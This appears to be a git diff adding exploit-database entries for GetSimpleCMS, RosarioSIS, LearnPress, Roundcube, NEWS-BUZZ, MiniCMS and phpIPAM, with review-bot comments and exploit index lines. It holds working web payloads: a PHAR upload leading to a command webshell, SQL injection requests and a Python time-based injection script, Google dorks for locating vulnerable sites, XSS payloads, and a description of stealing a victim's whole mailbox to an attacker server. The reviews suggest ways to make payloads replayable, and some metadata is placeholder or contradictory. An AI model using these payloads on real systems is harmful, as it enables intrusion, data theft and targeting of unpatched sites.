@@ -0,0 +1,55 @@ +# Exploit Title: [GetSimpleCMS < 3.3.16 Remote Code Execution via PHAR File Upload in admin/upload.php] +# Date: [2024-10-26] +# Exploit Author: [CodeSecLab] +# Vendor Homepage: [https://github.com/GetSimpleCMS/GetSimpleCMS] +# Software Link: [https://github.com/GetSimpleCMS/GetSimpleCMS] +# Version: [3.3.16] +# Tested on: [Ubuntu Windows] +# CVE : [CVE-2021-28976] + +PoC-1: +1)Create a .phar file. +1. Create the PHP script: Save your code (the one you provided) in a file, say index.php: +2. Write a PHP script to create the .phar file: Use the Phar class in PHP to package the index.php file into a .phar archive. Create a script named create_phar.php as follows: +startBuffering(); + $phar->addFromString('index.php', file_get_contents('index.php')); + $phar->setStub($phar->createDefaultStub('index.php')); + $phar->stopBuffering(); + + echo "Phar archive created successfully!"; +} catch (Exception $e) { + echo "Error: " . $e->getMessage(); +} +3. Run the script to generate the .phar file: On your terminal (assuming you're using a system that has PHP installed), run the following command to execute the script: php create_phar.php. +After running the script, you should find a file named archive.phar in your working directory. + +2)Upload file: +1. Upload the 'archive.phar' file using the vulnerable upload functionality at http://getsimplecms/admin/upload.php. +2. You can find the file at http://getsimplecms/data/uploads/. 
+ +3)Details: + "Validation Mechanisms Before Patch": "File extension blacklist and MIME type blacklist were used but lacked specific filtering for 'phar' file types.", + "Bypass Technique": "Upload a 'phar' file, as it was not included in the original blacklist, which can be treated as a PHP archive by the server for remote code execution.", + "Request URL": "http://getsimplecms/admin/upload.php", + "Request Method": "POST", + "Request Parameters": { + "file": "" + }, + + +PoC-2: +1) LLM creates the file exploit.phar with the following contents: +malicious.php 0000644 0000000 0000000 00000000036 00000000000 010442 0 ustar 00 + +2) +1. Prepare a PHP file named 'exploit.phar' .\n +2. Send a POST request to http://getsimplecms/admin/upload.php with the 'exploit.phar' file as the 'file' parameter.\n +3. Access the uploaded file at http://getsimplecms/data/uploads/exploit.phar and execute commands by passing the 'cmd' parameter (e.g., http://getsimplecms/data/uploads/exploit.phar?cmd=id). + +[Replace Your Domain Name] \ No newline at end of file diff --git a/exploits/php/webapps/52169.txt b/exploits/php/webapps/52169.txt new file mode 100644 index 000000000..6ce964756 --- /dev/null +++ b/exploits/php/webapps/52169.txt 
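Review bot: PoC-2's listing `malicious.php 0000644 0000000 0000000 00000000036 ... ustar 00` is a tar member header, and the 30-byte member body (the PHP that reads `cmd`) is not shown, so a reader cannot rebuild `exploit.phar` or reproduce `exploit.phar?cmd=id`; include the member contents or a one-line `php -r` that writes the archive. Executing an uploaded `.phar` as PHP also depends on the web server mapping that extension to the PHP handler (typically true for Debian/Ubuntu's mod_php configuration, not universally), which should be stated as a prerequisite next to the `http://getsimplecms/data/uploads/exploit.phar` URL. The wording `1) LLM creates the file exploit.phar` signals the second PoC was generated rather than run; the `# Tested on: [Ubuntu Windows]` line should reflect what was actually verified, or PoC-2 should be dropped in favour of the working PoC-1.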
@@ -0,0 +1,17 @@ +# Exploit Title: [RosarioSIS < 7.6.1 Unauthenticated SQL Injection via votes Parameter in PortalPollsNotes.fnc.php] +# Date: [2024-10-26] +# Exploit Author: [CodeSecLab] +# Vendor Homepage: [https://gitlab.com/francoisjacquet/rosariosis] +# Software Link: [https://gitlab.com/francoisjacquet/rosariosis] +# Version: [7.6] +# Tested on: [Ubuntu Windows] +# CVE : [CVE-2021-44567] + +PoC: +POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1 +X-Requested-With: XMLHttpRequest + +constrain and some flow: +isset( $_POST['votes'] ) && is_array( $_POST['votes'] ) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && foreach ( (array) $_POST['votes'] as $poll_id => $votes_array ) && if ( ! empty( $votes_array ) ) && PortalPollsVote( $poll_id, $votes_array ) + +votes['; CREATE TABLE aaa(t text) --]=1 \ No newline at end of file diff --git a/exploits/php/webapps/52171.txt b/exploits/php/webapps/52171.txt new file mode 100644 index 000000000..eb43c8a07 --- /dev/null +++ b/exploits/php/webapps/52171.txt 
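Review bot: The PoC request carries no `Host` and no `Content-Type: application/x-www-form-urlencoded` header, and the body `votes['; CREATE TABLE aaa(t text) --]=1` is shown unencoded, so it cannot be replayed as-is; give it as `votes%5B%27%3B+CREATE+TABLE+aaa%28t+text%29+--%5D=1` (PHP still parses the bracketed key into the `$_POST['votes']` array that the quoted `is_array` check requires). The `X-Requested-With: XMLHttpRequest` header is correctly included since the quoted code gates on it; say so explicitly rather than leaving the reader to infer it from the `constrain and some flow` line. The title's `< 7.6.1` and `# Version: [7.6]` should be reconciled — state that 7.6 was tested and 7.6.1 is the fix.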
@@ -0,0 +1,182 @@ +My name: Francisco Moraga (BTshell) +@BTshell + +https://www.linkedin.com/in/btshell/ + +# Exploit Title: LearnPress WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields' +# Google Dork: inurl:"/wp-json/learnpress/v1/" OR inurl:"/wp-content/plugins/learnpress/" OR "powered by LearnPress" AND "version 4.2.7" +# Date: [Current Date, e.g., October 30, 2024] +# Exploit Author: [Your Name or Username] +# Vendor Homepage: https://thimpress.com/learnpress/ +# Software Link: https://wordpress.org/plugins/learnpress/ +# Version: <= 4.2.7 +# Tested on: WordPress 6.x, Ubuntu 22.04 + +CVE : CVE-2024-8522CVE-2024-8522 - SQL Injection in LearnPress WordPress Plugin (Python exploit) + +Overview + +CVE: CVE-2024-8522 + +Plugin: LearnPress – WordPress LMS Plugin (version <= 4.2.7) + +Type: SQL Injection + +Impact: High + +Affected Component: Unauthenticated endpoint parameter c_only_fields in LearnPress API + +Description + +The vulnerability exists in the LearnPress WordPress plugin, versions up to 4.2.7. An unauthenticated SQL Injection flaw is present in the c_only_fields parameter of the LearnPress API endpoint. This flaw allows attackers to execute arbitrary SQL commands by manipulating API requests without authentication. If exploited, this could lead to unauthorized database access, potentially exposing sensitive data or even allowing administrative control through database manipulation. + +Affected Code Path + +The vulnerability is triggered by accessing the LearnPress API and injecting SQL commands through the c_only_fields parameter. 
Below is the code path leading to this vulnerability: + +plaintext + +class-lp-db.php:702, LP_Database->execute() + +class-lp-course-db.php:564, LP_Course_DB->get_courses() + +Courses.php:241, LearnPress\Models\Courses::get_courses() + +class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses() + +class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request() + +class-wp-rest-server.php:1063, WP_REST_Server->dispatch() + +Proof of Concept (PoC) + +The vulnerability can be demonstrated by sending a request to the API endpoint with a malicious payload in the c_only_fields parameter. Below is an example of an HTTP request that injects a conditional SQL statement to test for vulnerability by causing a time delay: + +http + +GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1 + +Host: +targetwebsite.com + +User-Agent: curl/7.81.0 + +Accept: */* + +Exploitation Script + +The following Python script automates the process of sending malicious requests to test for this SQL injection vulnerability by measuring response time, indicating potential success if there is a delay. 
+ +python + +import requests + +import time + +# Target URL for the API endpoint + +url = ' +http://targetwebsite.com/wp-json/learnpress/v1/courses +' + +# SQL injection payloads + +payloads = [ + +"IF(COUNT(*) > 0, SLEEP(10), 0)", # Test for successful injection + +"IF(1=1, SLEEP(10), 0)", # Basic true condition + +"IF(1=2, SLEEP(10), 0)", # Basic false condition + +] + +# Iterate over payloads and measure response time + +for payload in payloads: + +params = {'c_only_fields': payload} + +start_time = time.time() # Record start time + +try: + +# Send request to the vulnerable endpoint + +response = requests.get(url, params=params) + +# Calculate response time + +response_time = time.time() - start_time + +# Display result + +print(f"Payload: {payload} | Status Code: {response.status_code} | Response Time: {response_time:.2f} seconds") + +# Check for delay indicative of a successful SQL injection + +if response_time > 10: + +print("Potential SQL Injection vulnerability detected (delay observed).") + +else: + +print("No delay observed; injection may be unsuccessful.") + +except requests.exceptions.RequestException as e: + +print(f"Error during request: {e}") + +Google Dorks for Identifying Vulnerable Sites + +To locate potentially vulnerable websites running LearnPress, the following Google dorks can help identify sites with the plugin: + +inurl:"/wp-content/plugins/learnpress/" + +inurl:"/wp-json/learnpress/v1/" + +"powered by LearnPress" AND "version 4.2.7" + +inurl:"/wp-content/plugins/learnpress/assets/js/" + +"LearnPress" AND "WordPress LMS Plugin" + +Disclaimer: Use of these dorks should only be conducted in an ethical manner, with proper permissions for testing on identified sites. + +Impact Analysis + +If exploited, this SQL Injection vulnerability can have severe impacts, including: + +Data Breach: Unauthorized access to sensitive data within the WordPress database, such as user credentials, course data, and personal information. 
+ +Privilege Escalation: An attacker may leverage the SQL injection to modify database entries, potentially elevating user roles and gaining administrative access. + +Site Defacement or Service Disruption: By altering content or database configurations, attackers can disrupt service availability or deface the website. + +Recommendations + +Immediate Update: Update the LearnPress plugin to a patched version when available. + +Web Application Firewall (WAF): Employ a WAF that can filter and block malicious SQL injection attempts. + +Least Privilege Access: Configure database users with the minimum necessary privileges to reduce potential impacts. + +Conclusion + +The SQL Injection vulnerability in LearnPress (<= 4.2.7) is a high-severity issue that exposes affected WordPress sites to data breaches, privilege escalation, and potential service disruption. It is crucial for site administrators using this plugin to update to a secure version and implement protective measures. + +This report summarizes the vulnerability, exploitation methods, and recommendations to mitigate risks associated with CVE-2024-8522. + +Este mensaje, incluyendo sus anexos, puede contener información clasificada como +confidencial dentro del marco del Sistema de Gestión de la Seguridad corporativo. +Si usted no es el destinatario, le rogamos lo comunique al remitente y +proceda a borrarlo, sin reenviarlo ni conservarlo, ya que su uso no +autorizado está prohibido legalmente. + +This message including any attachments may contain confidential information, +within the framework of the corporate Security Management System. +If you are not the intended recipient, please notify the sender and +delete this message without forwarding or retaining a copy, since any +unauthorized use is strictly prohibited by law. + +Enviado con el correo electrónico seguro de [Proton Mail](https://proton.me/mail/home). \ No newline at end of file 
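Review bot: The header still contains template placeholders — `# Date: [Current Date, e.g., October 30, 2024]` and `# Exploit Author: [Your Name or Username]` — and the CVE line reads `CVE : CVE-2024-8522CVE-2024-8522`, so the metadata should be filled in (`# Date: 2024-10-30`, `# Exploit Author: Francisco Moraga (BTshell)`, `# CVE : CVE-2024-8522`) and the Proton Mail confidentiality footer at the end removed. In the script, `requests.get(url, params=params)` has no `timeout=`, so a hung server stalls the loop forever; use `requests.get(url, params=params, timeout=30)`. The detection prints each payload in isolation, but the diagnostic value is in the differential — `IF(1=1, SLEEP(10), 0)` slow and `IF(1=2, SLEEP(10), 0)` fast — so record both timings and report injection only when the true case exceeds the false case by roughly the sleep interval, which also avoids false positives from a merely slow host.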
diff --git a/exploits/php/webapps/52173.txt b/exploits/php/webapps/52173.txt new file mode 100644 index 000000000..c04555c2e --- /dev/null +++ b/exploits/php/webapps/52173.txt 
@@ -0,0 +1,56 @@ +# Exploit Title: Roundcube mail server exploit for CVE-2024-37383 (Stored XSS) +# Google Dork: +# Exploit Author: AmirZargham +# Vendor Homepage: Roundcube - Free and Open Source Webmail Software +# Software Link: Releases · roundcube/roundcubemail +# Version: Roundcube client version earlier than 1.5.6 or from 1.6 to 1.6.6. +# Tested on: firefox,chrome +# CVE: CVE-2024-37383 +# CWE: CWE-79 +# Platform: MULTIPLE +# Type: WebApps + + +Description: + + +The CVE-2024-37383 vulnerability was discovered in the Roundcube Webmail email client. This is a stored XSS vulnerability that allows an attacker to execute JavaScript code on the user's page. To exploit the vulnerability, all attackers need to do is open a malicious email using a Roundcube client version earlier than 1.5.6 or from 1.6 to 1.6.6. + + +Usage Info:1 - open the Roundcube_mail_server_exploit_for_CVE-2024-37383.txt and export js file.2 - Change the web address of the original email (target) and the URL of the receiving server (attacker server).3 - You can put the code in file SVG tag and send it to the server. (can use this https://github.com/bartfroklage/CVE-2024-37383-POC)4 - After the victim clicks, all emails in the mailbox will be sent to your collaborator server. + + +This code automates the process of retrieving all messages inbox from a Roundcube webmail server and forwarding that data to a specific collaborator server endpoint.Here’s a step-by-step breakdown: +- +Setup URLs: + +- The main webmail URL (target) and the receiving server URL (attackerserver) are defined as variables at the beginning for easy configuration. + +- +Get Total Page Count: + +- The getPageCount function sends a GET request to the main webmail URL to fetch metadata, including the total number of pages (pagecount). +- If pagecount is found, it proceeds to loop through each page. + +- +Fetch Message IDs from All Pages: + +- For each page from 1 to pagecount, it constructs a paginated URL to request that page. 
+- Each page’s response is checked for instances of add_message_row(NUMBER) using regex, extracting message IDs from each instance and collecting all IDs in a single list. + +- +Retrieve Each Message's Content: + +- For each message ID, the code constructs a URL to request detailed data about that message. +- It sends a GET request for each message ID URL, receiving the full response HTML. + +- +Extract and Clean Message Data: + +- Within each message response, it uses regex to capture the (message title) and main message content. +- Any HTML tags are stripped from the message content to keep only the plain text. + +- +Send the Data to the Server: + +- For each extracted message, a POST request is made to the server endpoint with the title and cleaned message content, URL-encoded for proper transmission. \ No newline at end of file diff --git a/exploits/php/webapps/52174.txt b/exploits/php/webapps/52174.txt new file mode 100644 index 000000000..46f650b27 --- /dev/null +++ b/exploits/php/webapps/52174.txt 
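Review bot: The entry describes a JavaScript exfiltration script (`getPageCount`, the `add_message_row(NUMBER)` regex, the POST to the collaborator) but the script itself is not in the file — the usage section points to `Roundcube_mail_server_exploit_for_CVE-2024-37383.txt` and a third-party GitHub PoC — so nothing here is runnable; either include the JS (with `target` and `attackerserver` as the two variables it names) or label the entry as a description only. `# Vendor Homepage: Roundcube - Free and Open Source Webmail Software` and `# Software Link: Releases · roundcube/roundcubemail` are page titles rather than URLs and should be `https://roundcube.net/` and `https://github.com/roundcube/roundcubemail/releases`. The four numbered usage steps are run together on a single `Usage Info:` line and should be split one per line.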
@@ -0,0 +1,61 @@ +# Exploit Title: NEWS-BUZZ News Management System - SQL Injection +# Google Dork: N/A +# Exploit Author: egsec +# Date: 2024-11-03 +# Vendor Homepage: https://code-projects.org +# Software Link: https://code-projects.org/content-management-system-in-php-with-source-code-2/ +# Version: 1.0 +# Tested on: Windows 11 Pro +# Impact: The manipulation of the argument user_name with an unknown input leads to a sql injection vulnerability +# CVE : CVE-2024-10758 + +## Vulnerability Description: + +There is a SQL injection vulnerability in the login part of the index.php file. It allows an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database. + +## Vulnerable code section: + +In the source code, you can find vulnerable code in the NEWS-BUZZ/login.php file: + +<?php +... +$query = "SELECT * FROM users WHERE username = '$username'"; +$result = mysqli_query($conn, $query) or die(mysqli_error($conn)); +... +?> + +In this line, the $username variable is directly embedded into the SQL query without proper handling. This allows an attacker to inject malicious SQL code. 
+ +## Proof of Concept (PoC): + +1.Location: http://localhost/NEWS-BUZZ/index.php + +2.Time-Based SQL Injection Payload: ' OR sleep(10)# + + +3.PoC request: + +POST /NEWS-BUZZ/login.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 69 +Origin: http://localhost +Connection: close +Referer: http://localhost/NEWS-BUZZ/index.php +Cookie: PHPSESSID=456n0gcbd6d09ecem39lrh3nu9 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Priority: u=0, i + +user_name=admin%27+or+sleep%2810%29%23&user_password=adminpass&login= + +4.PoC response: + +The response will come called time by using sleep() function. \ No newline at end of file diff --git a/exploits/php/webapps/52175.txt b/exploits/php/webapps/52175.txt new file mode 100644 index 000000000..3f3d0412d --- /dev/null +++ b/exploits/php/webapps/52175.txt 
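Review bot: The description places the flaw in `index.php` (`login part of the index.php file`) while the code excerpt and the PoC request both name `NEWS-BUZZ/login.php`; if index.php is only the form that posts to login.php, the first sentence should say `login.php`. The excerpt shows `$username` but the request parameter is `user_name`; one line showing how `$username` is populated from `$_POST['user_name']` (if that is what the code does) would close the gap for readers. The remediation is a prepared statement, e.g. `$stmt = $conn->prepare("SELECT * FROM users WHERE username = ?"); $stmt->bind_param("s", $username);`, which the entry could state instead of ending at `The response will come called time` — that sentence should read `The response is delayed by the sleep() call`.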
@@ -0,0 +1,16 @@ +# Exploit Title: [MiniCMS 1.1 Cross-Site Scripting (XSS) in date Parameter of mc-admin/page.php] +# Date: [2024-10-26] +# Exploit Author: [CodeSecLab] +# Vendor Homepage: [https://github.com/bg5sbk/MiniCMS] +# Software Link: [https://github.com/bg5sbk/MiniCMS] +# Version: [1.10] +# Tested on: [Ubuntu Windows] +# CVE : [CVE-2018-1000638] + +PoC: +GET http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script> + +Details: +{ "Sink": "echo $filter_date;", "Vulnerable Variable": "filter_date", "Source": "GET parameter 'date'", "Sanitization Mechanisms Before Patch": "None (directly echoed without encoding)", "Sink Context Constraints": "Injected in HTML attribute (URL query string)", "Attack Payload": ""><script>alert('XSS')</script>", "Execution Path Constraints": "The 'date' GET parameter must be set in the URL query string and passed without filtering", "Request URL": "http://minicms/mc-admin/page.php?date=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E", "Request Parameter":"date","Request Method": "GET", "Final PoC": "http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>" } + +[Replace Your Domain Name] \ No newline at end of file diff --git a/exploits/php/webapps/52176.txt b/exploits/php/webapps/52176.txt new file mode 100644 index 000000000..f6300903f --- /dev/null +++ b/exploits/php/webapps/52176.txt 
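Review bot: The title says `MiniCMS 1.1` while the header says `# Version: [1.10]`; the two should agree (the CVE record, if followed, uses 1.10). The `Details` block is presented as JSON but `"Attack Payload": ""><script>alert('XSS')</script>"` contains unescaped double quotes inside a string, so it is not parseable — escape them as `\"><script>...` as the `Final PoC` value already does, or drop the JSON framing. The bracketed `[Ubuntu Windows]` and `[Replace Your Domain Name]` are template leftovers.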
@@ -0,0 +1,27 @@ +# Exploit Title: [phpIPAM 1.6 Reflected XSS via closeClass Parameter in popup.php] +# Date: [2024-10-26] +# Exploit Author: [CodeSecLab] +# Vendor Homepage: [https://github.com/phpipam/phpipam] +# Software Link: [https://github.com/phpipam/phpipam] +# Version: [1.5.1] +# Tested on: [Ubuntu Windows] +# CVE : [CVE-2023-24657] +PoC: +1)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(1)%3C/script%3E +2)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22 +Details: +{ + "Sink": "print @$_REQUEST['closeClass']", + "Vulnerable Variable": "closeClass", + "Source": "$_REQUEST['closeClass']", + "Sanitization Mechanisms Before Patch": "None", + "Sink Context Constraints": "Reflected within HTML attributes without escaping", + "Attack Payload": "\" onclick=\"alert(1)\"", + "Execution Path Constraints": "Directly accessed from the 'closeClass' parameter without modification", + "Request URL": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22", + "Request Method": "GET", + "Final PoC": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22" +} + + +[Replace Your Domain Name] \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0df3b6e22..7f215d5ae 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
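Review bot: The title says `phpIPAM 1.6` while the header says `# Version: [1.5.1]`; the entry should state which release was actually tested and which one fixes it, since the two numbers currently contradict each other. The `Details` block lists `"Sink Context Constraints": "Reflected within HTML attributes without escaping"` for both payloads, but PoC 1 (`%22%3E%3Cscript%3E...`) breaks out of the attribute while PoC 2 (`%22%20onclick=%22alert(1)%22`) stays inside it and needs a click; a one-line note on that difference would help readers pick the right one. The bracketed `[Ubuntu Windows]` and `[Replace Your Domain Name]` are template leftovers.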
@@ -10397,7 +10397,15 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3851,exploits/multiple/dos/3851.c,"ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,dos,multiple,,2007-05-03,2017-10-07,1,CVE-2007-1669,,,,,
 42294,exploits/multiple/dos/42294.py,"Zookeeper 3.5.2 Client - Denial of Service",2017-07-02,"Brandon Dennis",dos,multiple,2181,2017-07-04,2017-10-04,0,CVE-2017-5637,,,,,
 32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple,,2008-11-12,2014-03-30,1,CVE-2008-5102;OSVDB-50487,,,,,https://www.securityfocus.com/bid/32267/info
+52182,exploits/multiple/hardware/52182.txt,"ABB Cylon Aspect 3.08.02 - PHP Session Fixation",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
+52180,exploits/multiple/hardware/52180.txt,"ABB Cylon FLXeon 9.3.4 - Cross-Site Request Forgery",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
+52179,exploits/multiple/hardware/52179.txt,"ABB Cylon FLXeon 9.3.4 - Default Credentials",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
+52188,exploits/multiple/hardware/52188.txt,"ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48841,,,,,
+52186,exploits/multiple/hardware/52186.txt,"ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE)",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48841,,,,,
+52178,exploits/multiple/hardware/52178.txt,"ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48852,,,,,
+52184,exploits/multiple/hardware/52184.txt,"ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48849,,,,,
 52160,exploits/multiple/hardware/52160.py,"Cosy+ firmware 21.2s7 - Command Injection",2025-04-10,CodeB0ss,hardware,multiple,,2025-04-10,2025-04-10,0,CVE-2024-33896,,,,,
+52183,exploits/multiple/hardware/52183.txt,"Netman 204 - Remote command without authentication",2025-04-11,"Parsa Rezaie Khiabanloo",hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
 11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,,
 51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,,
 38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,,
@@ -10541,6 +10549,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 288,exploits/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Local Privilege Escalation",2001-03-04,"the itch",local,multiple,,2001-03-03,,1,,,,,,
 51983,exploits/multiple/local/51983.txt,"PrusaSlicer 2.6.1 - Arbitrary code execution",2024-04-12,"Kamil Breński",local,multiple,,2024-04-12,2024-04-12,0,,,,,,
 43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2016-0772,,,,,https://github.com/tintinweb/pub/tree/11f6ebda59ad878377df78351f8ab580660d0024/pocs/cve-2016-0772
+52190,exploits/multiple/local/52190.py,"qBittorrent 5.0.1 - MITM RCE",2025-04-11,"Jordan Sharp",local,multiple,,2025-04-11,2025-04-11,0,CVE-2024-51774,,,,,
 21078,exploits/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",local,multiple,,2001-08-23,2012-09-05,1,CVE-2001-1003;OSVDB-11802,,,,,https://www.securityfocus.com/bid/3228/info
 47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-5899,,,,,https://github.com/bcoles/local-exploits/blob/3c5cd80a7c59ccd29a2c2a1cdbf71e0de8e66c11/CVE-2017-5899/exploit.sh
 49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,,2020-11-27,2020-11-27,0,,,,,,
@@ -11808,6 +11817,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50317,exploits/multiple/webapps/50317.txt,"Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)",2021-09-22,"Akıner Kısa",webapps,multiple,,2021-09-22,2021-09-22,0,CVE-2021-40868,,,,,
 50527,exploits/multiple/webapps/50527.txt,"CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)",2021-11-16,"Hosein Vita",webapps,multiple,,2021-11-16,2021-11-16,0,,,,,,
 9727,exploits/multiple/webapps/9727.txt,"CMScontrol (Content Management Portal Solutions) - SQL Injection",2009-09-21,ph1l1ster,webapps,multiple,,2009-09-20,,1,OSVDB-58292;CVE-2009-3326,,,,,
+52181,exploits/multiple/webapps/52181.txt,"CMU CERT/CC VINCE 2.0.6 - Stored XSS",2025-04-11,LiquidWorm,webapps,multiple,,2025-04-11,2025-04-11,0,,,,,,
 50185,exploits/multiple/webapps/50185.py,"Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection",2021-08-10,"Brian Ombongi",webapps,multiple,,2021-08-10,2021-08-10,0,CVE-2020-35848;CVE-2020-35847,,,,http://www.exploit-db.comcockpit-0.11.1.zip,
 49397,exploits/multiple/webapps/49397.txt,"Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)",2021-01-08,"Metin Yunus Kandemir",webapps,multiple,,2021-01-08,2021-01-08,0,,,,,,
 42610,exploits/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,webapps,multiple,,2017-09-04,2017-09-04,0,CVE-2017-13754,,,,,https://www.vulnerability-lab.com/get_content.php?id=2074
@@ -11837,6 +11847,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18473,exploits/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - Remote File Inclusion",2012-02-08,Vulnerability-Lab,webapps,multiple,,2012-02-08,2012-02-08,0,OSVDB-79326;CVE-2012-1047,,,,,https://www.vulnerability-lab.com/get_content.php?id=405
 47063,exploits/multiple/webapps/47063.html,"CyberPanel 1.8.4 - Cross-Site Request Forgery",2019-07-01,"Bilgi Birikim Sistemleri",webapps,multiple,,2019-07-01,2019-07-03,0,,"Cross-Site Request Forgery (CSRF)",,,,
 50230,exploits/multiple/webapps/50230.py,"CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)",2021-08-27,"numan türle",webapps,multiple,,2021-08-27,2021-08-27,0,,,,,,
+52172,exploits/multiple/webapps/52172.py,"CyberPanel 2.3.6 - Remote Code Execution (RCE)",2025-04-11,"Luka Petrovic (refr4g)",webapps,multiple,,2025-04-11,2025-04-11,0,CVE-2024-51378,,,,,
 50909,exploits/multiple/webapps/50909.txt,"Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)",2022-05-11,"Tin Pham",webapps,multiple,,2022-05-11,2022-05-11,0,CVE-2021-31673,,,,,
 50908,exploits/multiple/webapps/50908.txt,"Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)",2022-05-11,"Tin Pham",webapps,multiple,,2022-05-11,2022-05-11,0,CVE-2021-31674,,,,,
 43847,exploits/multiple/webapps/43847.py,"DarkComet (C2 Server) - File Upload",2018-01-15,"Pseudo Laboratories",webapps,multiple,,2018-01-21,2018-01-21,0,,Malware,,,,https://pseudolaboratories.github.io/DarkComet-upload-vulnerability/
@@ -11933,6 +11944,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
 37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
 52144,exploits/multiple/webapps/52144.txt,"GeoVision GV-ASManager 6.1.0.0 - Information Disclosure",2025-04-08,"Giorgi Dograshvili",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2024-56902,,,,,
+52189,exploits/multiple/webapps/52189.txt,"GeoVision GV-ASManager 6.1.0.0 - Broken Access Control",2025-04-11,"Giorgi Dograshvili",webapps,multiple,,2025-04-11,2025-04-11,0,CVE-2024-56898,,,,,
+52187,exploits/multiple/webapps/52187.txt,"GeoVision GV-ASManager 6.1.1.0 - CSRF",2025-04-11,"Giorgi Dograshvili",webapps,multiple,,2025-04-11,2025-04-11,0,CVE-2024-56901,,,,,
